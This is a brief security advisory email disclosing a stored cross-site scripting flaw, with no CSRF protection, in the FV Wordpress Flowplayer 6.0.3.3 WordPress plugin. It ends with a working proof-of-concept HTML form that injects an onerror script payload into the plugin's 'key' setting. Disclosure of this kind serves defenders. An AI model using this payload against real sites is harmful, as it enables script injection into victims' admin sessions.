Subject: Persistent Cross-Site Scripting (XSS) in FV Wordpress Flowplayer 6.0.3.3
Date: Mon, 24 Aug 2015 14:55:15 +0200

Hello,

Plugin: FV Wordpress Flowplayer 6.0.3.3 https://wordpress.org/plugins/fv-wordpress-flowplayer/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code in plugin configuration values (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=fvplayer
Vulnerable parameters: key, width, height, googleanalytics, splash, rtmp, etc...

Example PHP callstack:
fv_flowplayer_admin_default_options   [/tmp/wpplugin/fv-wordpress-flowplayer/view/admin.php:247]

Verification (store arbitrary key configuration value):
--
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=fvplayer" />
<input type="text" name="fv-wp-flowplayer-submit" value="1" />
<input type="text" name="key" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,